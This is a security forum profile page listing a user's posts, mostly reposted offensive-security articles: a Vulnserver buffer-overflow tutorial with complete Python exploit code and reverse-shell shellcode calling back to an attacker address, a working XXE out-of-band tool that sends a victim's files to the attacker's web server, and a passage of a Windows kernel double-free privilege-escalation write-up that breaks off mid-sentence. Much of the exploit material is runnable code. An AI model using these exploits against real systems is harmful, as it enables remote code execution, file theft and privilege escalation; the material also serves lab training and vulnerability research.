Jump to content

Nytro

Administrators
  • Posts

    18740
  • Joined

  • Last visited

  • Days Won

    711

Everything posted by Nytro

  1. Da, de la Windows s-a trecut la Mac. Pentru IE sunt deja o gramada de fuzzere, stiam de Chrome ca e in top, dar nu am vazut prea mult tam-tam legat de el...
  2. Am vazut, infosecinstitute a decazut rau de tot.
  3. Ha? Ce sa "facem"? PS: Ai mai mult de 18 ani sau esti la liceu si vrei sa stii pe ce drum vrei sa mergi?
  4. De ce vrei sa stii?
  5. @CarlCasper - Ceva de zis in apararea ta?
  6. Pai arata-ne si noua dovezile.
  7. Exploiting Buffer Overflows Posted by cyberkryption on February 14, 2015 Recently, at the Digital jersey Open Source event, I gave a talk on exploiting a buffer overflow. I used win 7 as a host for the vulnerable Vulnserver application which you can get from the Grey Corner bloghere. The presentation is here, some of the videos are missing. The videos were only a backup if the live demo ran into issues. The final exploit code is shown below, with the steps to achieve it shown afterwards Final Exploit Code [TABLE=width: 917] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 [/TD] [TD=class: code]</pre></pre> <pre>#!/usr/bin/python import socket server = '192.168.43.12' port = 9999 prefix = 'A' * 2006 eip = '\xAF\x11\x50\x62' nopsled = '\x90' * 16 #msfpayload windows/shell_reverse_tcp LHOST=192.168.43.213 LPORT=443 EXITFUNC=thread R | msfencode -b '\x00' -e x86/shikata_ga_nai exploit = ( "\xbb\x7d\x25\x14\xae\xda\xc0\xd9\x74\x24\xf4\x5e\x 33\xc9" + "\xb1\x52\x31\x5e\x12\x03\x5e\x12\x83\x93\xd9\xf6\x 5b\x97" + "\xca\x75\xa3\x67\x0b\x1a\x2d\x82\x3a\x1a\x49\xc7\x 6d\xaa" + "\x19\x85\x81\x41\x4f\x3d\x11\x27\x58\x32\x92\x82\x be\x7d" + "\x23\xbe\x83\x1c\xa7\xbd\xd7\xfe\x96\x0d\x2a\xff\x df\x70" + "\xc7\xad\x88\xff\x7a\x41\xbc\x4a\x47\xea\x8e\x5b\x cf\x0f" + "\x46\x5d\xfe\x9e\xdc\x04\x20\x21\x30\x3d\x69\x39\x 55\x78" + "\x23\xb2\xad\xf6\xb2\x12\xfc\xf7\x19\x5b\x30\x0a\x 63\x9c" + "\xf7\xf5\x16\xd4\x0b\x8b\x20\x23\x71\x57\xa4\xb7\x d1\x1c" + "\x1e\x13\xe3\xf1\xf9\xd0\xef\xbe\x8e\xbe\xf3\x41\x 42\xb5" + "\x08\xc9\x65\x19\x99\x89\x41\xbd\xc1\x4a\xeb\xe4\x af\x3d" + "\x14\xf6\x0f\xe1\xb0\x7d\xbd\xf6\xc8\xdc\xaa\x3b\x e1\xde" + "\x2a\x54\x72\xad\x18\xfb\x28\x39\x11\x74\xf7\xbe\x 56\xaf" + "\x4f\x50\xa9\x50\xb0\x79\x6e\x04\xe0\x11\x47\x25\x 6b\xe1" + "\x68\xf0\x3c\xb1\xc6\xab\xfc\x61\xa7\x1b\x95\x6b\x 28\x43" + "\x85\x94\xe2\xec\x2c\x6f\x65\xd3\x19\x44\xa0\xbb\x 5b\x9a" + "\x4b\x87\xd5\x7c\x21\xe7\xb3\xd7\xde\x9e\x99\xa3\x 7f\x5e" + "\x34\xce\x40\xd4\xbb\x2f\x0e\x1d\xb1\x23\xe7\xed\x 8c\x19" + "\xae\xf2\x3a\x35\x2c\x60\xa1\xc5\x3b\x99\x7e\x92\x 6c\x6f" + "\x77\x76\x81\xd6\x21\x64\x58\x8e\x0a\x2c\x87\x73\x 94\xad" + "\x4a\xcf\xb2\xbd\x92\xd0\xfe\xe9\x4a\x87\xa8\x47\x 2d\x71" + "\x1b\x31\xe7\x2e\xf5\xd5\x7e\x1d\xc6\xa3\x7e\x48\x b0\x4b" + "\xce\x25\x85\x74\xff\xa1\x01\x0d\x1d\x52\xed\xc4\x a5\x72" + "\x0c\xcc\xd3\x1a\x89\x85\x59\x47\x2a\x70\x9d\x7e\x a9\x70" + "\x5e\x85\xb1\xf1\x5b\xc1\x75\xea\x11\x5a\x10\x0c\x 85\x5b" + "\x31" ) brk = '\xcc' padding = 'F' * (3000 - 2006 - 4 - 16 - 1) attack = prefix + eip + nopsled + exploit + brk + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending Evil Buffer to TRUN " s.send(('TRUN .' + attack + '\r\n')) print s.recv(1024) s.send('EXIT\r\n') print s.recv(1024) s.close() <pre>[/TD] [/TR] [/TABLE] The stages of code used to achieve remote code execution are shown below. Code 1 – Initial Crash [TABLE=width: 549] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 [/TD] [TD=class: code]</pre> #!/usr/bin/python import socket server = '192.168.43.12' port = 9999 length = int(raw_input('Length of attack: ')) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending attack length ", length, ' to TRUN .' attack = 'A' * length s.send(('TRUN .' + attack + '\r\n')) print s.recv(1024) s.send('EXIT\r\n') print s.recv(1024) s.close() <pre>[/TD] [/TR] [/TABLE] Code 2 – Cyclic Pattern to locate EIP [TABLE=width: 19925] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [/TD] [TD=class: code]</pre> #!/usr/bin/python import socket server = '192.168.43.12' port = 9999 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending Evil Buffer to TRUN ." attack = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab 6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A d3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9 Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag 6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2A i3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9 Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al 6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A n3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9 Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq 6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2A s3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9 Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av 6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A x3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9 Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba 6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2B c3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9 Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf 6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B h3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9 Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk 6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2B m3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9 Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp 6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2B r3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9 Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu 6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2B w3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9 By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz 6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2C b3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9 Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce 6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2C g3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9 Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj 6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2C l3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9 Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co 6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2C q3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9 Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct 6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2C v3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9 Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy 6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2D a3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9 Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd 6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D f3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9 Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di 6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2D k3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9 Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn 6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2D p3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9 Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds 6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2D u3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9" s.send(('TRUN .' + attack + '\r\n')) print s.recv(1024) s.send('EXIT\r\n') print s.recv(1024) s.close() <pre>[/TD] [/TR] [/TABLE] Code 3 – Convert.sh used to convert Hex to ASCII [TABLE=width: 549] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 [/TD] [TD=class: code]</pre> TESTDATA=$(echo '0x38.0x43.0x6F.0x39' | tr '.' ' ') for c in $TESTDATA; do echo $c | xxd -r done echo ""</pre> <pre><pre>[/TD] [/TR] [/TABLE] Code 4 - Confirm EIP location in Buffer [TABLE=width: 549] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [/TD] [TD=class: code]</pre> #!/usr/bin/python import socket server = '192.168.43.12' sport = 9999 prefix = 'A' * 2006 eip = 'BBBB' padding = 'F' * (3000 - 2006 - 4) attack = prefix + eip + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, sport)) print s.recv(1024) print "Sending Buffer to TRUN " s.send(('TRUN .' + attack + '\r\n')) print s.recv(1024) s.send('EXIT\r\n') print s.recv(1024) s.close() </pre> <pre><pre>[/TD] [/TR] [/TABLE] Code 5 - Confirming JMP ESP [TABLE=width: 549] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 [/TD] [TD=class: code]</pre></pre> <pre>#!/usr/bin/python import socket server = '192.168.43.12' port = 9999 prefix = 'A' * 2006 eip = '\xAF\x11\x50\x62' nopsled = '\x90' * 16 brk = '\xcc' padding = 'F' * (3000 - 2006 - 4 - 16 - 1) attack = prefix + eip + nopsled + brk + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending Evil Buffer to TRUN " s.send(('TRUN .' + attack + '\r\n')) print s.recv(1024) s.send('EXIT\r\n') print s.recv(1024) s.close() </pre> <pre><pre>[/TD] [/TR] [/TABLE] Code 6 - Bad Characters [TABLE=width: 944] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 [/TD] [TD=class: code]</pre></pre> <pre>#!/usr/bin/python import socket server = '192.168.43.12' port = 9999 prefix = 'A' * 2006 eip = '\x42\x42\x42\x42' nopsled = '\x90' * 16 badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x 0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19 \x1a\x1b\x1c\x1d\x1e\x1f" "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x 2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38 \x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x 4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59 \x5a\x5b\x5c\x5d\x5e\x5f" "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x 6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78 \x79\x7a\x7b\x7c\x7d\x7e\x7f" "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x 8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98 \x99\x9a\x9b\x9c\x9d\x9e\x9f" "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\x ac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8 \xb9\xba\xbb\xbc\xbd\xbe\xbf" "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\x cc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8 \xd9\xda\xdb\xdc\xdd\xde\xdf" "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\x ec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8 \xf9\xfa\xfb\xfc\xfd\xfe\xff" ) brk = '\xcc' padding = 'F' * (3000 - 2006 - 4 - 16 - 1) attack = prefix + eip + nopsled + badchars + brk + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending Evil Buffer to TRUN " s.send(('TRUN .' + attack + '\r\n')) print s.recv(1024) s.send('EXIT\r\n') print s.recv(1024) s.close() </pre> <pre><pre>[/TD] [/TR] [/TABLE] That’s All Folks….! Sursa: https://cyberkryption.wordpress.com/2015/02/14/exploiting-buffer-overflows/
      • 1
      • Upvote
  8. Exploiting Xxe With Out of Band Channels Hey, this post is about a cool technique that was at Blackhat EU in 2013, By Alexey Osipov & Timur Yunusov. The idea is basically to use recursive external entity injection to have the vulnerable application send a http request to an attackers web server with the contents of a file of their choice. This works by reading the file and adding it as a payload to the end of url, we then try to load this as an external entity so if we look in the log files of the web server we can see the files contents so long as it can be rendered as plaintext or xml.In the video they talk about a metasploit module that can be used to exploit this, we needed it to exploit soapsonar, however I didn’t have any luck finding it so myself and Rob decided we would build our own. Ok, so the code isn’t very good, I’m not a programmer by any stretch of the imagination but it does work. Here is a video of us using it exploit a real application: #[Authors]: Ben 'highjack' Sheppard (@highjack_) & Rob Daniel (@_drxp)#[Title]: XXE OOB file retriever #[Usage]: sudo python xxeoob.py localfile #[Special Thanks]: Alexey Osipov (@GiftsUngiven), Timur Yunusov (@a66at) thanks for the awesome OOB techniques and Dade Murphy import BaseHTTPServer, argparse, socket, sys, urllib, os, ntpath localPort = 0 localIP = "" localFile = "" def status(message): print "\033[0;31;1m[\033[0;34;1m+\033[0;31;1m] \033[0;32;1m" + message + "\033[0m" def end(): status("Completed - Press any key to close") raw_input() quit() class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): print """\033[0;31;1m _ ._ _ , _ ._ (_ ' ( ` )_ .__) ( ( ( ) `) ) _) (__ (_ (_ . _) _) ,__) `~~`\ ' . /`~~` ,::: ; ; :::, ':::::::::::::::' __________/_ __ \____________ \033[0;31;1m[\033[0;34;1m Title\033[0;31;1m] XXE OOB file retriever \033[0;31;1m[\033[0;34;1mAuthors\033[0;31;1m] Ben Sheppard & Rob Daniel\033[0m """ global localIP localIP = socket.gethostbyname(socket.gethostname()) parser = argparse.ArgumentParser() parser.add_argument("file", help="set local file to extract data from", action="store") parser.add_argument("--port", help="port number for web server to listen on", action="store", default=80) parser.add_argument("--iface", help="specify the interface to listen on", action="store", default="eth0") parser.add_argument("--mode", help="print) outputs stage 1\nurl)crafts stage 1 url)", action="store", default="url") args = parser.parse_args() if localIP.startswith("127."): ipCommand = "ifconfig " + args.iface + " | grep -Eo 'inet addr:[0-9]{1,3}.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | cut -f 2 -d :" ipOutput = os.popen(ipCommand) localIP = ipOutput.readline().replace("\n","") global localFile localFile = args.file global localPort localPort = int(args.port) global stage1content stage1content = "<?xml version=\"1.0\" encoding=\"utf-8\"?><!DOCTYPE root [<!ENTITY % remote SYSTEM \"http://" + localIP +":" + str(localPort) + "/stage2.xml\">%remote;%int;%trick;]>" if args.mode == "print": status("Printing xml so it can be pasted into vulnerable app:") print stage1content else: status("Malicious xml file is located at http://" + localIP + ":" + str(localPort )+ "/stage1.xml") def log_request(self, *args, **kwargs): pass def do_GET(s): pageContent = "" if "/stage1.xml" in s.path: status("Receiving stage1 request") pageContent = stage1content elif "/stage2.xml" in s.path: status("Receiving stage2 request") global localFile pageContent = "<!ENTITY % payl SYSTEM \"" + localFile + "\"> <!ENTITY % int \"<!ENTITY % trick SYSTEM 'http://" + localIP + ":"+ str(localPort) + "?%payl;'>\">" else: status("Saving contents of " + localFile + " to " + os.path.dirname(os.path.abspath(__file__))) pageContent = "" localFile = ntpath.basename(localFile) fo = open(localFile, "wb") try: fo.write(urllib.unquote(s.path).decode('utf8')); except Exception,e: print str(e) fo.close() status("Completed - Press any key to close") raw_input() try: httpd.server_close() except: pass s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(pageContent) if __name__ == '__main__': server_class = BaseHTTPServer.HTTPServer httpd = server_class(('', localPort), MyHandler) try: httpd.serve_forever() except: pass httpd.server_close() Posted by highjack Sursa: exploiting xxe with out of band channels - highjack
  9. Just another day at the office: A ZDI analyst’s perspective on ZDI-15-030 Matt_Molinyawe| February 19, 2015Post a Comment Matt Molinyawe Security Researcher HP Security Research – Zero Day Initiative Many of us here at the ZDI are blessed to look at the world’s best vulnerability research coming from researchers around the world. For those of us who work at the ZDI, it’s literally nothing but zero-day, every day. And we’re not just saying that. It’s documented by the record number of published vulnerabilities attained last year and is the most for a single year in the history of the Zero Day Initiative program. An interesting case came in through the program in late October from a researcher named n3phos. The report contained vulnerability information affecting the win32k.sys kernel component on Windows 8.1 x64, and examples included in the case were very well-documented and well-written. We recently released an advisory for the case, which is ZDI-15-030 in our system. This is also known as CVE-2015-0058 to MITRE, and was addressed as part of MS15-010 by Microsoft. Here is a write up from the submission which we felt was exceptional and wanted to share with the research community. Let’s start things off with a demo of the Windows Kernel privilege escalation for Windows 8.1 x64: Similar to the old phrase “cleanliness is next to godliness”, this privilege escalation cleaned up after itself to prevent crashing the operating system and attained SYSTEM privileges. The privilege escalation came in with source code with bypasses to ASLR, SMEP, and full continuation of execution. I compiled the source to verify this case. As you can see in the video, this was a pretty straightforward case to look at. Vulnerability Analysis The report had noted that a crash would occur with the following actions taken: hCursorA = CreateCursor( NULL, 1, 1, 4, 4, AndMask, XORMask); hCursorB = CreateCursor( NULL, 1, 1, 4, 4, AndMask, XORMask); linked = CallService( __NR_NtUserLinkDpiCursor, SYSCALL_ARG(hCursorA), SYSCALL_ARG(hCursorB), SYSCALL_ARG(0x30), ); CallService(__NR_NtUserDestroyCursor, SYSCALL_ARG(hCursorB), SYSCALL_ARG(0x0), ); CallService(__NR_NtUserDestroyCursor, SYSCALL_ARG(hCursorA), SYSCALL_ARG(0x0), ); I compiled an executable for this code and ran it in release mode, and a screen appeared called the “Sad Face of Sorrow” (formerly colloquially known as the “Blue Screen of Death”). Figure 1: Sad Face of Sorrow The following crash stack signature appeared in the kernel debugger: Figure 2: The crash stack signature; click upper image to open in new window Looking at the access violation, it appeared that the memory was freed and accessed again by the call to DestroyCursor. Figure 3: The access violation The debug session of the crash verified the researcher’s findings in the report, in which n3phos had noted: There was an attempt made to free a memory location which has already been freed before (double free). This happens during the second call to NtUserDestroyCursor where CursorA gets destroyed and is caused by the reuse of a dangling pointer to the already freed CursorB. By linking CursorA and CursorB together with a call to NtUserLinkDpiCursor, all we have to do in order to hit the double free, is to destroy CursorB before CursorA. And since we have control between the two calls, we can easily replace the freed CursorB. How the cursors are linked The report noted the following about cursors inside of NtUserLinkDpiCursor: Figure 4: A closer look at NtUserLinkDpiCursor (click to open larger image in new tab) LinkDpiCursor takes three arguments -- two valid cursor handles and one dword as a new dpi value. It first checks if the dpi is a multiple of 0x10 and in the range of 0x10 – 0x40. Then GetCursorForDim looks if CursorA’s current dpi is equal to the newly provided dpi. If it is, the function fails. The default dpi value for a cursor created with CreateCursor is 0x20. By supplying 0x30 as argument, we can pass GetCursorForDim and reach the linking code which, when simplified, looks like this: CursorB->prevPointer = CursorA CursorB->nextPointer = CursorA->nextPointer CursorA->nextPointer = CursorB Here’s more information regarding the cursor object: Figure 5: Empty cursor object on the way (click to open larger image in new window) When calling CreateCursor, a new empty cursor object gets allocated through HMAllocObject, which then calls Win32AllocPool. What’s important to note here is the allocation size of 0x98 bytes and the POOL_TYPE 0x21 enumerable value that stands for “PagedPoolSession.” This information will be useful later on when utilizing this bug. Figure 6: Inside DestroyCursor (click to open larger image in new tab) The code checks whether a specific cursor flag is set. If it is not set, the function proceeds to check if the cursor has its nextPointer initialized and if so, takes the branch to the recursive DestroyCursor call. However, if the cursor flag is set, the code part on the left gets taken and there is some unlinking being performed. In the case where Cursor gets created with CreateCursor, this flag is never set. What happens in the PoC is the following: CursorA and CursorB get linked together. CursorB gets normally destroyed and freed, no unlinking is performed. CursorA gets destroyed, with the branch taken to the recursive DestroyCursor call because its nextPointer points to CursorB. Previously destroyed CursorB gets destroyed again. It is now clear that one can easily take advantage of this bug between step 2 and 3 by replacing the freed cursor object. EXPLOITATION n3phos then looked more closely into the DestroyCursor function. During this function there is a call made to CleanupCursorObject: Figure 7: Calling CleanupCursorObject If an attacker happens to control the values at offset 0x38 and offset 0x40, he can free an arbitrary object of their choice. This needs some kind of memory leak. Replacing the cursor with something useful As mentioned earlier, the cursor object gets allocated on the PagedPoolSession. This means that we have to exclude pretty much all the allocations that are used in the ntoskrnl module as a possible replacement for the cursor since they get allocated on the NonPagedPoolNx (PoolType 0x200). The small allocation size of 0x98 bytes is also a problem because most of the GDI objects are bigger than that. A possible object that would fit in would be, for example, a solid brush (0x98 bytes in size). But because it gets allocated with Win32AllocateFromPagedLookasideList, the address will never be the same as of the freed cursor. One further restriction is the need of zero reference count. The researcher decided to use a gesture info structure. Figure 8: AllocGestureInfo Like the cursor, this gesture info structure gets allocated by HMAllocObject. What really matters is that we have enough control of its members to trigger the arbitrary free in CleanupCursorObject. ulArguments is @ offset 0x38 in the cursor and needs to be nonzero; arbitraryFree @ offset 0x40 is where the leaked object address gets written. The size of this gesture info object is calculated as follows: 0x30(cbSize) + 0x40(cbExtraArgs) + 0x30 (internally) = 0xa0 bytes. (The cursor is actually 0xa0 bytes big) Leaking an object The object used to leak was a Palette object. This object can be created with the CreatePalette GDI function. It takes one logical palette as an argument: palNumEntries The number of entries in the logical palette. palPalEntry Specifies an array of PALETTEENTRY structures that define the color and usage of each entry in the logical palette. A paletteentry is basically a DWORD that defines the RGB values the palette uses and is built like that: 0x00bbggrr. The zero is a flag. If we look at the palette in memory it looks something like this: Figure 9: The palette object When the palette gets allocated, its size is calculated like this: 0x98 (which is the basic object size) + 4 * numEntries One can control the size of the palette to an extent, which will be important later on when we leak it. (Besides that, this object has some very interesting members, so if you ever happen to have a bug in GDI you might want to have one of these.) For example if you overwrite the numEntries member you can read and write out of bounds (on the PagedPool). By overwriting the palEntries pointer at offset 0x80, we can read and write anywhere. Also, the “this” pointer will be quite useful in the information leak. To read and write we just call the following from Gdi32 in userland: GetPaletteEntries (reading) SetPaletteEntries (writing) xxxBMPtoDIB To understand how the “information leak” works, we first need to know a bit more about DIBs and the Clipboard. From the MSDN description: A DIB (device-independent bitmap) is a format used to define device-independent bitmaps in various color resolutions… … A DIB is normally transported in metafiles (usually using the StretchDIBits function), BMP files, and the Clipboard (CF_DIB data format)… …The header actually consists of two adjoining parts: the header proper and the color table. Both are combined in the BITMAPINFO structure, which is what all DIB APIs expect ------------------- BITMAPINFO structure: biBitCount The number of bits-per-pixel. The biBitCount member of the BITMAPINFOHEADER defines the maximum number of colors in the bitmap. 4 The bitmap has a maximum of 16 colors, and the bmiColors member of BITMAPINFO contains up to 16 entries. 8 The bitmap has a maximum of 256 colors, and the bmiColors member of BITMAPINFO contains up to 256 entries. 16 The bitmap has a maximum of 2^16 colors. bmiColors An array of RGBQUAD (like palettentry) . The elements of the array that make up the color table. ------------------- These are the important fields. As it was mentioned in the MSDN description, the BITMAPINFO structure consists of a BITMAPINFOHEADER followed by a color table (bmiColors). The color table is just an array of integers and its maximum size is specified by the biBitCount member. Now if we create (for example) a DIB with a bit count of 4, we would need to allocate 0x68 bytes of memory, because 0x28 bytes are used for the header (biSize) and 0x40 bytes would be used for the color table (maximum number of entries * 4 = 0x10 ( 16 entries ) * 4 = 0x40 bytes) This is all we need to know about DIBs, so the next thing to look at is the clipboard. The clipboard is used by applications to transfer data between them or when you copy and paste different formats like texts and pictures and so forth. There are so-called standard clipboard formats2 that are defined by the system: To place something on the clipboard, one has to call OpenClipboard first and then make a call to SetClipboardData. This takes the format (a constant value) as a first argument and a HANDLE to the data in the specified format as a second argument. To get something from the clipboard we call GetClipboardData and pass the format we want. Another thing we need to know is that the clipboard can convert data between certain clipboard formats. If we request data in a format that is not on the clipboard, the system converts an available format to the requested format. For example if we put normal text on the clipboard and we request data in CF_UNICODETEXT format, the text gets converted to Unicode. Converting a special bitmap to a DIB, however, leads to uninitialized data being leaked. In order to reach the vulnerable function xxxBMPtoDIB in win32k there needs to be a “dummy Dib” on the clipboard. This can be achieved by: Opening the clipboard. Emptying the 